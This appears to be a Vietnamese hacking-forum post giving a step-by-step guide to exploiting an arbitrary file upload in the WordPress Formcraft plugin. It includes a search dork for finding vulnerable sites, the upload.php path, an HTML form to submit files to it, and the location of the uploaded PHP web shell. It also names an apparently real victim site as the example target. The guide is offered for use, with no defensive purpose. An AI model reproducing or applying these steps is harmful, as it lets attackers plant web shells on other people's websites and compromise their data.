– Dork : “powered by Formcraft”
– Vuln : {“failed”:”No file found 2″}
– Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php
– Your Accses Shell / File : wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]nameshell.php
– CSRF Script :
<form method=”POST” action=”target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
Save your script use format .html
| Tham gia kênh Telegram của AnonyViet 👉 Link 👈 | 
– My Target Is : http://sellfastoregon.com/
Add exploit in that link then become : http://sellfastoregon.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php
Yeahh that vuln
– Copy that link into your script
– then save use .html
– Open your script
– That is uploader
– Upload your shell
– My name of shell is : bcc.php
– Click Upload
– This is a codeshell–nameshell.php [154df070a157db—bcc.php]
– Then show up your codeshell.php
– Copy codeshell.php into url bar
– Paste your codeshell.php in the : wp-content/plugins/formcraft/file-upload/server/php/files/[codeshell]nameshell.php
 
  
 






![Dork Upload File FCKeditor [Update] 12 Dork Upload File FCKeditor [Update]](https://anonyviet.com/wp-content/uploads/2016/01/TheAppleHackAndWhatItMeansToYou-350x250.jpg)

![Admin Login Bypass [0day] 14 Admin Login Bypass [0day] 1](https://anonyviet.com/wp-content/uploads/2015/12/kUwvo30-350x250.png)
 
 




Ad giải thích thêm cho bài này đi, một số bạn không chuyên nên không hiểu cái này là cài gì